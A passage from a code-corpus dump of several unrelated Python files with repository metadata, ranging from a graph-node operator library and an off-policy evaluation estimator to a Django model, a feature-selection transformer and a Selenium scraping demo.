self.op_name = f"{fnc.__name__}"
self.kwargs["target"] = f"{fnc.__module__}.{fnc.__name__}"
def __getitem__(self, key):
return self
@property
def domain(self):
return self.kwargs["domain"]
def get_index_nodes(self, slice1_var=None, slice2_var=None):
if slice1_var is None and slice2_var is None:
slice1_var, slice2_var = self.args
if isinstance(slice1_var, (slice_op, var_index)) or _is_node_type_instance(slice1_var, "GroupNode"):
slice1_idx = slice1_var.domain
else:
slice1_idx = Domain(tuple([]))
if isinstance(slice2_var, (slice_op, var_index)) or _is_node_type_instance(slice2_var, "GroupNode"):
slice2_idx = slice2_var.domain
else:
slice2_idx = Domain(tuple([]))
return slice1_var, slice1_idx, slice2_var, slice2_idx
def _evaluate(self, *args, **kwargs):
for aa in list(kwargs.keys()):
if aa in self.added_attrs:
kwargs.pop(aa)
return self.target(*args, **kwargs)
def __call__(self, *args, **kwargs):
return call(self, *args, **kwargs)
def __repr__(self):
return "<func_op '%s' target=%s args=<%d items>>" % \
(self.name, self.kwargs["target"], len(self.args))
def nodeop(target=None, **kwargs):
"""
Decorator for creating nodes from functions.
"""
# This is called when the decorator is used with arguments
if target is None:
return functools.partial(nodeop, **kwargs)
# This is called when the decorator is used without arguments
@functools.wraps(target)
def _wrapper(*args, **kwargs_inner):
return func_op(target, *args, **kwargs_inner, **kwargs)
return _wrapper
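# Illustrative sketch (hypothetical function name): any plain function can be lifted into a
# graph node this way; calling the wrapped function builds a func_op instead of computing a
# value immediately, and the value is produced later when the node is evaluated.
#
#   @nodeop
#   def scaled_sum(x, y, factor=1.0):
#       return factor * (x + y)
#
#   node = scaled_sum(2, 3, factor=2.0)   # a func_op, not 10.0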
@nodeop
def call(func, *args, **kwargs):
"""
Call `func` with positional arguments `args` and keyword arguments `kwargs`.
Parameters
----------
func : callable
Function to call when the node is executed.
args : list
Sequence of positional arguments passed to `func`.
kwargs : dict
Mapping of keyword arguments passed to `func`.
"""
return func(*args, **kwargs)
@contextlib.contextmanager
def control_dependencies(dependencies, graph=None):
"""
Ensure that all `dependencies` are executed before any nodes in this scope.
Parameters
----------
dependencies : list
        Sequence of nodes to be evaluated before evaluating any nodes defined in this
scope.
"""
# Add dependencies to the graph
graph = Node.get_active_graph(graph)
graph.dependencies.extend(dependencies)
yield
# Remove dependencies from the graph
del graph.dependencies[-len(dependencies):]
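# Illustrative sketch (init_fn and work_fn are hypothetical callables): nodes created inside
# the block pick up the listed dependencies, so evaluating `result` evaluates `setup` first.
#
#   with Node(name="main") as g:
#       setup = call(init_fn)
#       with control_dependencies([setup]):
#           result = call(work_fn)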
#pylint: disable=C0103
abs_ = nodeop(builtins.abs)
dict_ = nodeop(builtins.dict)
help_ = nodeop(builtins.help)
min_ = nodeop(builtins.min)
setattr_ = nodeop(builtins.setattr)
all_ = nodeop(builtins.all)
dir_ = nodeop(builtins.dir)
hex_ = nodeop(builtins.hex)
next_ = nodeop(builtins.next)
slice_ = nodeop(builtins.slice)
any_ = nodeop(builtins.any)
divmod_ = nodeop(builtins.divmod)
id_ = nodeop(builtins.id)
object_ = nodeop(builtins.object)
sorted_ = nodeop(builtins.sorted)
ascii_ = nodeop(builtins.ascii)
enumerate_ = nodeop(builtins.enumerate)
input_ = nodeop(builtins.input)
oct_ = nodeop(builtins.oct)
staticmethod_ = nodeop(builtins.staticmethod)
bin_ = nodeop(builtins.bin)
eval_ = nodeop(builtins.eval)
int_ = nodeop(builtins.int)
open_ = nodeop(builtins.open)
str_ = nodeop(builtins.str)
bool_ = nodeop(builtins.bool)
exec_ = nodeop(builtins.exec)
isinstance_ = nodeop(builtins.isinstance)
ord_ = nodeop(builtins.ord)
sum_ = nodeop(builtins.sum)
bytearray_ = nodeop(builtins.bytearray)
filter_ = nodeop(builtins.filter)
issubclass_ = nodeop(builtins.issubclass)
pow_ = nodeop(builtins.pow)
super_ = nodeop(builtins.super)
bytes_ = nodeop(builtins.bytes)
float_ = nodeop(builtins.float)
iter_ = nodeop(builtins.iter)
print_ = nodeop(builtins.print)
tuple_ = nodeop(builtins.tuple)
callable_ = nodeop(builtins.callable)
format_ = nodeop(builtins.format)
len_ = nodeop(builtins.len)
property_ = nodeop(builtins.property)
type_ = nodeop(builtins.type)
chr_ = nodeop(builtins.chr)
frozenset_ = nodeop(builtins.frozenset)
list_ = nodeop(builtins.list)
range_ = nodeop(builtins.range)
vars_ = nodeop(builtins.vars)
classmethod_ = nodeop(builtins.classmethod)
getattr_ = nodeop(builtins.getattr)
locals_ = nodeop(builtins.locals)
repr_ = nodeop(builtins.repr)
zip_ = nodeop(builtins.zip)
compile_ = nodeop(builtins.compile)
globals_ = nodeop(builtins.globals)
map_ = nodeop(builtins.map)
reversed_ = nodeop(builtins.reversed)
complex_ = nodeop(builtins.complex)
hasattr_ = nodeop(builtins.hasattr)
max_ = nodeop(builtins.max)
round_ = nodeop(builtins.round)
delattr_ = nodeop(builtins.delattr)
hash_ = nodeop(builtins.hash)
memoryview_ = nodeop(builtins.memoryview)
set_ = nodeop(builtins.set)
add = nodeop(operator.add)
and_ = nodeop(operator.and_)
attrgetter = nodeop(operator.attrgetter)
concat = nodeop(operator.concat)
contains = nodeop(operator.contains)
countOf = nodeop(operator.countOf)
delitem = nodeop(operator.delitem)
eq = nodeop(operator.eq)
floordiv = nodeop(operator.floordiv)
ge = nodeop(operator.ge)
getitem = nodeop(operator.getitem)
gt = nodeop(operator.gt)
index = nodeop(operator.index)
indexOf = nodeop(operator.indexOf)
inv = nodeop(operator.inv)
invert = nodeop(operator.invert)
ior = nodeop(operator.ior)
ipow = nodeop(operator.ipow)
irshift = nodeop(operator.irshift)
is_ = nodeop(operator.is_)
is_not = nodeop(operator.is_not)
itemgetter = nodeop(operator.itemgetter)
le = nodeop(operator.le)
length_hint = nodeop(operator.length_hint)
lshift = nodeop(operator.lshift)
lt = nodeop(operator.lt)
matmul = nodeop(operator.matmul)
methodcaller = nodeop(operator.methodcaller)
mod = nodeop(operator.mod)
mul = nodeop(operator.mul)
ne = nodeop(operator.ne)
neg = nodeop(operator.neg)
not_ = nodeop(operator.not_)
or_ = nodeop(operator.or_)
pos = nodeop(operator.pos)
rshift = nodeop(operator.rshift)
setitem = nodeop(operator.setitem)
sub = nodeop(operator.sub)
truediv = nodeop(operator.truediv)
truth = nodeop(operator.truth)
xor = nodeop(operator.xor)
import_ = nodeop(importlib.import_module)
| 2.53125 | 3 |
actors/models.py | rngallen/beyond_basics | 0 | 3475 |
from django.db import models
from django.utils.translation import ugettext_lazy as _
# Create your models here.
class Actor(models.Model):
name = models.CharField(_("name"), max_length=200)
# if is_star he/she will be directed to hollywood else directed to commercial
    is_star = models.BooleanField(_("is star"), default=False)
def __str__(self):
return self.name
| 2.53125 | 3 |
docs/buildscripts/docs.py | cwlalyy/mongo-c-driver | 13 | 3476 | """Build the C client docs.
"""
from __future__ import with_statement
import os
import shutil
import socket
import subprocess
import time
import urllib2
def clean_dir(dir):
try:
shutil.rmtree(dir)
except:
pass
os.makedirs(dir)
def gen_api(dir):
clean_dir(dir)
clean_dir("docs/source/doxygen")
with open(os.devnull, 'w') as null:
subprocess.call(["doxygen", "doxygenConfig"], stdout=null, stderr=null)
os.rename("docs/source/doxygen/html", dir)
def gen_sphinx(dir):
clean_dir(dir)
os.chdir("docs/source/sphinx")
with open(os.devnull, 'w') as null:
subprocess.call(["make", "html"], stdout=null, stderr=null)
os.chdir("../../../")
if os.path.isdir("docs/source/sphinx/build/html"):
os.rename("docs/source/sphinx/build/html", dir)
def version():
"""Get the driver version from doxygenConfig.
"""
with open("doxygenConfig") as f:
for line in f.readlines():
if line.startswith("PROJECT_NUMBER"):
return line.split("=")[1].strip()
def main():
print("Generating Sphinx docs in docs/html")
gen_sphinx("docs/html")
print("Generating Doxygen docs in docs/html/api")
gen_api("docs/html/api")
if __name__ == "__main__":
main()
| 2.484375 | 2 |
tilegame/render/rs.py | defgsus/thegame | 1 | 3477 | import glm
import math
from lib.opengl import RenderSettings
class GameProjection:
def __init__(self, rs: "GameRenderSettings"):
self.rs = rs
self.scale = 10.
self.rotation_deg = 0.
self.location = glm.vec3(0)
self._stack = []
def projection_matrix_4(self) -> glm.mat4:
scale = 1.
ratio = self.rs.render_width / self.rs.render_height
m = glm.ortho(-scale * ratio, scale * ratio, -scale, scale, -10, 10)
return m
def transformation_matrix_4(self) -> glm.mat4:
m = glm.rotate(
glm.mat4(1), -self.rotation_deg / 180 * glm.pi(), glm.vec3(0, 0, 1)
)
m = m * glm.scale(glm.mat4(), glm.vec3(2. / self.scale))
m = m * glm.translate(glm.mat4(), glm.vec3(-self.location.x, -self.location.y, 0))
return m
def transformation_matrix(self) -> glm.mat3:
m = rotation_matrix_2d(self.rotation_deg)
m *= self.scale * .5
m[2][0] = self.location.x
m[2][1] = self.location.y
return m
def push(self):
self._stack.append({
"scale": self.scale,
"rotation": self.rotation_deg,
"location": self.location.__copy__(),
})
def pop(self):
s = self._stack.pop(-1)
self.scale = s["scale"]
self.rotation_deg = s["rotation"]
self.location = s["location"]
def __enter__(self):
self.push()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.pop()
def rotation_matrix_2d(degree: float) -> glm.mat3:
a = degree / 180. * math.pi
sa = math.sin(a)
ca = math.cos(a)
return glm.mat3(
ca, sa, 0,
-sa, ca, 0,
0, 0, 1
)
class GameRenderSettings(RenderSettings):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.projection = GameProjection(self)
| 2.390625 | 2 |
tools/stats/export_slow_tests.py | stungkit/pytorch | 2 | 3478 |
#!/usr/bin/env python3
import argparse
import json
import os
import statistics
from collections import defaultdict
from tools.stats.s3_stat_parser import (
get_previous_reports_for_branch,
Report,
Version2Report,
)
from typing import cast, DefaultDict, Dict, List, Any
from urllib.request import urlopen
SLOW_TESTS_FILE = ".pytorch-slow-tests.json"
SLOW_TEST_CASE_THRESHOLD_SEC = 60.0
RELATIVE_DIFFERENCE_THRESHOLD = 0.1
IGNORED_JOBS = ["asan", "periodic"]
def get_test_case_times() -> Dict[str, float]:
reports: List[Report] = get_previous_reports_for_branch("origin/viable/strict", "")
# an entry will be like ("test_doc_examples (__main__.TestTypeHints)" -> [values]))
test_names_to_times: DefaultDict[str, List[float]] = defaultdict(list)
for report in reports:
if report.get("format_version", 1) != 2: # type: ignore[misc]
raise RuntimeError("S3 format currently handled is version 2 only")
v2report = cast(Version2Report, report)
if any(job_name in str(report["build_job"]) for job_name in IGNORED_JOBS):
continue
for test_file in v2report["files"].values():
for suitename, test_suite in test_file["suites"].items():
for casename, test_case in test_suite["cases"].items():
# The below attaches a __main__ as that matches the format of test.__class__ in
# common_utils.py (where this data will be used), and also matches what the output
# of a running test would look like.
name = f"{casename} (__main__.{suitename})"
succeeded: bool = test_case["status"] is None
if succeeded:
test_names_to_times[name].append(test_case["seconds"])
return {
test_case: statistics.mean(times)
for test_case, times in test_names_to_times.items()
}
def filter_slow_tests(test_cases_dict: Dict[str, float]) -> Dict[str, float]:
return {
test_case: time
for test_case, time in test_cases_dict.items()
if time >= SLOW_TEST_CASE_THRESHOLD_SEC
}
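# Hedged illustration (not part of the original tooling): with the 60s
# threshold above, only the first entry survives the filter, e.g.
#   filter_slow_tests({"test_big (__main__.T)": 75.0, "test_tiny (__main__.T)": 0.4})
#   -> {"test_big (__main__.T)": 75.0}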
def get_test_infra_slow_tests() -> Dict[str, float]:
url = "https://raw.githubusercontent.com/pytorch/test-infra/generated-stats/stats/slow-tests.json"
contents = urlopen(url, timeout=1).read().decode("utf-8")
return cast(Dict[str, float], json.loads(contents))
def too_similar(
calculated_times: Dict[str, float], other_times: Dict[str, float], threshold: float
) -> bool:
# check that their keys are the same
if calculated_times.keys() != other_times.keys():
return False
for test_case, test_time in calculated_times.items():
other_test_time = other_times[test_case]
relative_difference = abs(
(other_test_time - test_time) / max(other_test_time, test_time)
)
if relative_difference > threshold:
return False
return True
def export_slow_tests(options: Any) -> None:
filename = options.filename
if os.path.exists(filename):
print(f"Overwriting existent file: {filename}")
with open(filename, "w+") as file:
slow_test_times: Dict[str, float] = filter_slow_tests(get_test_case_times())
if options.ignore_small_diffs:
test_infra_slow_tests_dict = get_test_infra_slow_tests()
if too_similar(
slow_test_times, test_infra_slow_tests_dict, options.ignore_small_diffs
):
slow_test_times = test_infra_slow_tests_dict
json.dump(
slow_test_times, file, indent=" ", separators=(",", ": "), sort_keys=True
)
file.write("\n")
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description="Export a JSON of slow test cases in PyTorch unit test suite"
)
parser.add_argument(
"-f",
"--filename",
nargs="?",
type=str,
default=SLOW_TESTS_FILE,
const=SLOW_TESTS_FILE,
help="Specify a file path to dump slow test times from previous S3 stats. Default file path: .pytorch-slow-tests.json",
)
parser.add_argument(
"--ignore-small-diffs",
nargs="?",
type=float,
const=RELATIVE_DIFFERENCE_THRESHOLD,
help="Compares generated results with stats/slow-tests.json in pytorch/test-infra. If the relative differences "
"between test times for each test are smaller than the threshold and the set of test cases have not "
"changed, we will export the stats already in stats/slow-tests.json. Else, we will export the calculated "
"results. The default threshold is 10%.",
)
return parser.parse_args()
def main() -> None:
options = parse_args()
export_slow_tests(options)
if __name__ == "__main__":
main()
| 2.25 | 2 |
ml/rl/evaluation/weighted_sequential_doubly_robust_estimator.py | michaeltashman/Horizon | 1 | 3479 | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import itertools
import logging
import numpy as np
import scipy as sp
import scipy.optimize  # makes sp.optimize available ("import scipy" alone does not load it)
import scipy.stats  # makes sp.stats available
import torch
from ml.rl.evaluation.cpe import CpeEstimate
from ml.rl.evaluation.evaluation_data_page import EvaluationDataPage
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class WeightedSequentialDoublyRobustEstimator:
NUM_SUBSETS_FOR_CB_ESTIMATES = 25
CONFIDENCE_INTERVAL = 0.9
NUM_BOOTSTRAP_SAMPLES = 50
BOOTSTRAP_SAMPLE_PCT = 0.5
def __init__(self, gamma):
self.gamma = gamma
def estimate(
self,
edp: EvaluationDataPage,
num_j_steps,
whether_self_normalize_importance_weights,
) -> CpeEstimate:
# For details, visit https://arxiv.org/pdf/1604.00923.pdf Section 5, 7, 8
(
actions,
rewards,
logged_propensities,
target_propensities,
estimated_q_values,
) = WeightedSequentialDoublyRobustEstimator.transform_to_equal_length_trajectories(
edp.mdp_id,
edp.action_mask.cpu().numpy(),
edp.logged_rewards.cpu().numpy().flatten(),
edp.logged_propensities.cpu().numpy().flatten(),
edp.model_propensities.cpu().numpy(),
edp.model_values.cpu().numpy(),
)
num_trajectories = actions.shape[0]
trajectory_length = actions.shape[1]
j_steps = [float("inf")]
if num_j_steps > 1:
j_steps.append(-1)
if num_j_steps > 2:
interval = trajectory_length // (num_j_steps - 1)
j_steps.extend([i * interval for i in range(1, num_j_steps - 1)])
target_propensity_for_logged_action = np.sum(
np.multiply(target_propensities, actions), axis=2
)
estimated_q_values_for_logged_action = np.sum(
np.multiply(estimated_q_values, actions), axis=2
)
estimated_state_values = np.sum(
np.multiply(target_propensities, estimated_q_values), axis=2
)
importance_weights = target_propensity_for_logged_action / logged_propensities
importance_weights = np.cumprod(importance_weights, axis=1)
importance_weights = WeightedSequentialDoublyRobustEstimator.normalize_importance_weights(
importance_weights, whether_self_normalize_importance_weights
)
importance_weights_one_earlier = (
np.ones([num_trajectories, 1]) * 1.0 / num_trajectories
)
importance_weights_one_earlier = np.hstack(
[importance_weights_one_earlier, importance_weights[:, :-1]]
)
discounts = np.logspace(
start=0, stop=trajectory_length - 1, num=trajectory_length, base=self.gamma
)
j_step_return_trajectories = []
for j_step in j_steps:
j_step_return_trajectories.append(
WeightedSequentialDoublyRobustEstimator.calculate_step_return(
rewards,
discounts,
importance_weights,
importance_weights_one_earlier,
estimated_state_values,
estimated_q_values_for_logged_action,
j_step,
)
)
j_step_return_trajectories = np.array(j_step_return_trajectories)
j_step_returns = np.sum(j_step_return_trajectories, axis=1)
if len(j_step_returns) == 1:
weighted_doubly_robust = j_step_returns[0]
weighted_doubly_robust_std_error = 0.0
else:
# break trajectories into several subsets to estimate confidence bounds
infinite_step_returns = []
num_subsets = int(
min(
num_trajectories / 2,
WeightedSequentialDoublyRobustEstimator.NUM_SUBSETS_FOR_CB_ESTIMATES,
)
)
interval = num_trajectories / num_subsets
for i in range(num_subsets):
trajectory_subset = np.arange(
int(i * interval), int((i + 1) * interval)
)
importance_weights = (
target_propensity_for_logged_action[trajectory_subset]
/ logged_propensities[trajectory_subset]
)
importance_weights = np.cumprod(importance_weights, axis=1)
importance_weights = WeightedSequentialDoublyRobustEstimator.normalize_importance_weights(
importance_weights, whether_self_normalize_importance_weights
)
importance_weights_one_earlier = (
np.ones([len(trajectory_subset), 1]) * 1.0 / len(trajectory_subset)
)
importance_weights_one_earlier = np.hstack(
[importance_weights_one_earlier, importance_weights[:, :-1]]
)
infinite_step_return = np.sum(
WeightedSequentialDoublyRobustEstimator.calculate_step_return(
rewards[trajectory_subset],
discounts,
importance_weights,
importance_weights_one_earlier,
estimated_state_values[trajectory_subset],
estimated_q_values_for_logged_action[trajectory_subset],
float("inf"),
)
)
infinite_step_returns.append(infinite_step_return)
# Compute weighted_doubly_robust mean point estimate using all data
weighted_doubly_robust = self.compute_weighted_doubly_robust_point_estimate(
j_steps,
num_j_steps,
j_step_returns,
infinite_step_returns,
j_step_return_trajectories,
)
# Use bootstrapping to compute weighted_doubly_robust standard error
bootstrapped_means = []
sample_size = int(
WeightedSequentialDoublyRobustEstimator.BOOTSTRAP_SAMPLE_PCT
* num_subsets
)
for _ in range(
WeightedSequentialDoublyRobustEstimator.NUM_BOOTSTRAP_SAMPLES
):
random_idxs = np.random.choice(num_j_steps, sample_size, replace=False)
random_idxs.sort()
wdr_estimate = self.compute_weighted_doubly_robust_point_estimate(
j_steps=[j_steps[i] for i in random_idxs],
num_j_steps=sample_size,
j_step_returns=j_step_returns[random_idxs],
infinite_step_returns=infinite_step_returns,
j_step_return_trajectories=j_step_return_trajectories[random_idxs],
)
bootstrapped_means.append(wdr_estimate)
weighted_doubly_robust_std_error = np.std(bootstrapped_means)
episode_values = np.sum(np.multiply(rewards, discounts), axis=1)
denominator = np.nanmean(episode_values)
if abs(denominator) < 1e-6:
return CpeEstimate(
raw=0.0, normalized=0.0, raw_std_error=0.0, normalized_std_error=0.0
)
return CpeEstimate(
raw=weighted_doubly_robust,
normalized=weighted_doubly_robust / denominator,
raw_std_error=weighted_doubly_robust_std_error,
normalized_std_error=weighted_doubly_robust_std_error / denominator,
)
def compute_weighted_doubly_robust_point_estimate(
self,
j_steps,
num_j_steps,
j_step_returns,
infinite_step_returns,
j_step_return_trajectories,
):
low_bound, high_bound = WeightedSequentialDoublyRobustEstimator.confidence_bounds(
infinite_step_returns,
WeightedSequentialDoublyRobustEstimator.CONFIDENCE_INTERVAL,
)
# decompose error into bias + variance
j_step_bias = np.zeros([num_j_steps])
where_lower = np.where(j_step_returns < low_bound)[0]
j_step_bias[where_lower] = low_bound - j_step_returns[where_lower]
where_higher = np.where(j_step_returns > high_bound)[0]
j_step_bias[where_higher] = j_step_returns[where_higher] - high_bound
covariance = np.cov(j_step_return_trajectories)
error = covariance + j_step_bias.T * j_step_bias
# minimize mse error
constraint = {"type": "eq", "fun": lambda x: np.sum(x) - 1.0}
x = np.zeros([len(j_steps)])
res = sp.optimize.minimize(
mse_loss,
x,
args=error,
constraints=constraint,
bounds=[(0, 1) for _ in range(x.shape[0])],
)
x = np.array(res.x)
return float(np.dot(x, j_step_returns))
@staticmethod
def transform_to_equal_length_trajectories(
mdp_ids,
actions,
rewards,
logged_propensities,
target_propensities,
estimated_q_values,
):
"""
Take in samples (action, rewards, propensities, etc.) and output lists
        of equal-length trajectories (episodes) according to terminals.
        As the raw trajectories are of various lengths, the shorter ones are
        padded with zeros (or ones) at the end.
"""
num_actions = len(target_propensities[0])
terminals = np.zeros(mdp_ids.shape[0])
for x in range(0, mdp_ids.shape[0]):
if x + 1 == mdp_ids.shape[0] or mdp_ids[x, 0] != mdp_ids[x + 1, 0]:
terminals[x] = 1
trajectories = []
episode_start = 0
episode_ends = np.nonzero(terminals)[0]
if len(terminals) - 1 not in episode_ends:
episode_ends = np.append(episode_ends, len(terminals) - 1)
for episode_end in episode_ends:
trajectories.append(np.arange(episode_start, episode_end + 1))
episode_start = episode_end + 1
action_trajectories = []
reward_trajectories = []
logged_propensity_trajectories = []
target_propensity_trajectories = []
Q_value_trajectories = []
for trajectory in trajectories:
action_trajectories.append(actions[trajectory])
reward_trajectories.append(rewards[trajectory])
logged_propensity_trajectories.append(logged_propensities[trajectory])
target_propensity_trajectories.append(target_propensities[trajectory])
Q_value_trajectories.append(estimated_q_values[trajectory])
def to_equal_length(x, fill_value):
x_equal_length = np.array(
list(itertools.zip_longest(*x, fillvalue=fill_value))
).swapaxes(0, 1)
return x_equal_length
action_trajectories = to_equal_length(
action_trajectories, np.zeros([num_actions])
)
reward_trajectories = to_equal_length(reward_trajectories, 0)
logged_propensity_trajectories = to_equal_length(
logged_propensity_trajectories, 1
)
target_propensity_trajectories = to_equal_length(
target_propensity_trajectories, np.zeros([num_actions])
)
Q_value_trajectories = to_equal_length(
Q_value_trajectories, np.zeros([num_actions])
)
return (
action_trajectories,
reward_trajectories,
logged_propensity_trajectories,
target_propensity_trajectories,
Q_value_trajectories,
)
@staticmethod
def normalize_importance_weights(
importance_weights, whether_self_normalize_importance_weights
):
if whether_self_normalize_importance_weights:
sum_importance_weights = np.sum(importance_weights, axis=0)
where_zeros = np.where(sum_importance_weights == 0.0)[0]
sum_importance_weights[where_zeros] = len(importance_weights)
importance_weights[:, where_zeros] = 1.0
importance_weights /= sum_importance_weights
return importance_weights
else:
importance_weights /= importance_weights.shape[0]
return importance_weights
@staticmethod
def calculate_step_return(
rewards,
discounts,
importance_weights,
importance_weights_one_earlier,
estimated_state_values,
estimated_q_values,
j_step,
):
trajectory_length = len(rewards[0])
num_trajectories = len(rewards)
j_step = int(min(j_step, trajectory_length - 1))
weighted_discounts = np.multiply(discounts, importance_weights)
weighted_discounts_one_earlier = np.multiply(
discounts, importance_weights_one_earlier
)
importance_sampled_cumulative_reward = np.sum(
np.multiply(weighted_discounts[:, : j_step + 1], rewards[:, : j_step + 1]),
axis=1,
)
if j_step < trajectory_length - 1:
direct_method_value = (
weighted_discounts_one_earlier[:, j_step + 1]
* estimated_state_values[:, j_step + 1]
)
else:
direct_method_value = np.zeros([num_trajectories])
control_variate = np.sum(
np.multiply(
weighted_discounts[:, : j_step + 1], estimated_q_values[:, : j_step + 1]
)
- np.multiply(
weighted_discounts_one_earlier[:, : j_step + 1],
estimated_state_values[:, : j_step + 1],
),
axis=1,
)
j_step_return = (
importance_sampled_cumulative_reward + direct_method_value - control_variate
)
return j_step_return
@staticmethod
def confidence_bounds(x, confidence):
n = len(x)
m, se = np.mean(x), sp.stats.sem(x)
h = se * sp.stats.t._ppf((1 + confidence) / 2.0, n - 1)
return m - h, m + h
def mse_loss(x, error):
return np.dot(np.dot(x, error), x.T)
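# Hedged illustration (not part of the original module): mse_loss is the
# quadratic form x @ error @ x.T that estimate() minimises when blending
# j-step returns, e.g. mse_loss(np.array([0.5, 0.5]), np.eye(2)) == 0.5.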
| 2.015625 | 2 |
LeetCode/2019-08-03-384-Shuffle-an-Array.py | HeRuivio/-Algorithm | 5 | 3480 | # -*- coding: utf-8 -*-
# @Author: 何睿
# @Create Date: 2019-08-03 10:48:30
# @Last Modified by: 何睿
# @Last Modified time: 2019-08-03 10:53:15
import copy
import random
from typing import List
class Solution:
def __init__(self, nums: List[int]):
self.shuffle_ = nums
self.original = copy.copy(nums)
def reset(self) -> List[int]:
"""
Resets the array to its original configuration and return it.
"""
return self.original
def shuffle(self) -> List[int]:
"""
Returns a random shuffling of the array.
"""
random.shuffle(self.shuffle_)
return self.shuffle_
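# Hedged usage sketch (not part of the LeetCode submission), mirroring the
# call pattern from the problem statement.
if __name__ == "__main__":
    obj = Solution([1, 2, 3])
    print(obj.shuffle())  # a random permutation such as [3, 1, 2]
    print(obj.reset())    # [1, 2, 3], the original configuration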
| 3.828125 | 4 |
src/wspc/feature_selection.py | shakedna1/wspc_rep | 0 | 3481 | import numpy as np
import sklearn
import pandas as pd
import scipy.spatial.distance as ssd
from scipy.cluster import hierarchy
from scipy.stats import chi2_contingency
from sklearn.base import BaseEstimator
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_selection import SelectKBest, SelectorMixin
from sklearn.pipeline import Pipeline
class SelectHierarchicalClustering(SelectorMixin, BaseEstimator):
"""
A transformer that clusters the features in X according to dist_matrix, and selects a feature from each cluster with
the highest chi2 score of X[feature] versus y
"""
def __init__(self, dist_matrix=None, threshold=1):
self.dist_matrix = dist_matrix
self.threshold = threshold
def _phi_coef(self, x, y):
"""
Calculates phi coefficient between features
Parameters
----------
x - feature x column
y - feature y column
Returns
----------
phi coefficient value
"""
confusion_matrix = pd.crosstab(x, y)
chi2 = chi2_contingency(confusion_matrix)[0]
n = confusion_matrix.sum().sum()
corr = np.sqrt(chi2 / n)
return corr
def _calc_dist_matrix(self, X):
"""
Calculate distance matrix between each two features in X, each value is 1-phi_correlation
"""
X_df = pd.DataFrame.sparse.from_spmatrix(X)
X_corr_mat = X_df.corr(method=self._phi_coef)
feature_corr_dist_matrix = 1 - X_corr_mat
feature_corr_dist_matrix_condensed = ssd.squareform(feature_corr_dist_matrix)
self.dist_matrix = feature_corr_dist_matrix_condensed
def _corr_linkage(self, method='average'):
linkage = hierarchy.linkage(self.dist_matrix, method=method)
return linkage
def _hierarchical_clustering(self, linkage):
"""
Perform hierarchical clustering
Parameters
----------
        linkage - linkage matrix created by hierarchy.linkage(self.dist_matrix, method=method)
Returns
----------
a list of lists, each list represents a cluster and contains the indexes of features belonging
to the cluster
"""
# array of len(X) - array[i] is the cluster number to which sample i belongs
cluster_ids = hierarchy.fcluster(linkage, self.threshold, criterion='distance')
cluster_id_to_feature_idx = {}
for idx, cluster_id in enumerate(cluster_ids):
cluster_id_to_feature_idx.setdefault(cluster_id, []).append(idx)
return list(cluster_id_to_feature_idx.values())
def fit(self, X, y):
"""
Clusters the features (X columns) using self.dist_matrix and self.threshold, and selects a feature from each
cluster with the highest chi2 score versus y.
The attribute self.n_features_ represents the number of features selected (=number of clusters)
The attribute self.selected_features_ is a list of indexes that correspond to the selected features
"""
        if self.dist_matrix is None:
self._calc_dist_matrix(X)
linkage = self._corr_linkage()
clusters = self._hierarchical_clustering(linkage)
chi2_vals, __ = sklearn.feature_selection.chi2(X, y)
chi2_vals = pd.Series(chi2_vals)
# fitted attributes
self.n_features_ = X.shape[1]
self.selected_features_ = [chi2_vals[cluster].idxmax() for cluster in clusters]
self.clusters_ = clusters
print(f'threshold={self.threshold:.2f}, selected_features={len(self.selected_features_)}')
return self
def _get_support_mask(self):
"""
Get the boolean mask indicating which features are selected
Returns
----------
mask - boolean array of shape [# input features]
An element is True iff its corresponding feature is selected for
retention.
"""
# Checks if the estimator is fitted by verifying the presence of fitted attributes (ending with a trailing
# underscore) and otherwise raises a NotFittedError with the given message.
sklearn.utils.validation.check_is_fitted(self)
mask = np.zeros((self.n_features_, ), dtype=bool)
mask[self.selected_features_] = 1
return mask
def get_fs_pipeline(k, threshold, random_state=0):
"""
Creates feature selection pipeline
Parameters
----------
k - the k parameter for the SelectKBest features function
threshold - clustering threshold for the Hierarchial clustering
random_state - random state for the RandomForestClassifier. Deafult value: 0
Returns
----------
pipeline - feature selection pipeline
"""
pipeline = Pipeline(steps=[('vectorize', CountVectorizer(lowercase=False, binary=True)),
('k_best', SelectKBest(score_func=sklearn.feature_selection.chi2, k=k)),
('cluster', SelectHierarchicalClustering(threshold=threshold)),
('rf', RandomForestClassifier(random_state=random_state))])
return pipeline
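# Hedged usage sketch (not part of the module): X_train/X_test are assumed to
# be iterables of whitespace-separated feature tokens (one string per sample)
# and y_train the matching labels; all names here are illustrative.
#   pipeline = get_fs_pipeline(k=300, threshold=0.8)
#   pipeline.fit(X_train, y_train)
#   predictions = pipeline.predict(X_test)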
| 2.640625 | 3 |
Python3/PS_scraping_selenium.py | fsj-digital/pages | 5 | 3482 | from bs4 import BeautifulSoup
import requests
import re
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.touch_actions import TouchActions
URL = 'https://shopping.thinkwithgoogle.com'
EXAMPLES = ["Demonstrate unexpected use-case",
"Demonstrate google search",
"Demonstrate search on thinkwithgoogle",
"Demonstrate search on WebDriverWait",
"Demonstrate search on thinkwithgoogle search result",
"Download and extract additional data",
"Demonstrate maximizing screen",
"Demonstrate mouse actions for Chrome",
"Demonstrate navigation"]
def run(input, URL):
if(input == 0):
content = requests.get(URL)
soup = BeautifulSoup(content.text,'html.parser')
print(soup.prettify()) # Print row with HTML formatting
elif(input == 1):
driver = webdriver.Safari()
driver.get("https://www.google.com")
search = driver.find_element_by_name("q")
search.send_keys("Sel<PASSWORD>") # Google Search "Selenium"
search.submit()
elif(input == 2):
browser = webdriver.Safari()
browser.get(URL)
time.sleep(5)
search = browser.find_elements_by_id('subjectInput')[1]
search.send_keys('Google <PASSWORD>') # Google Search "Google Pixel 3"
time.sleep(5)
search.send_keys(Keys.RETURN)
elif(input == 3):
browser = webdriver.Safari()
browser.maximize_window() # Required for the input tag visibility
browser.get('https://trends.google.com/trends/')
try: # proceed if element is found within 3 seconds otherwise raise TimeoutException
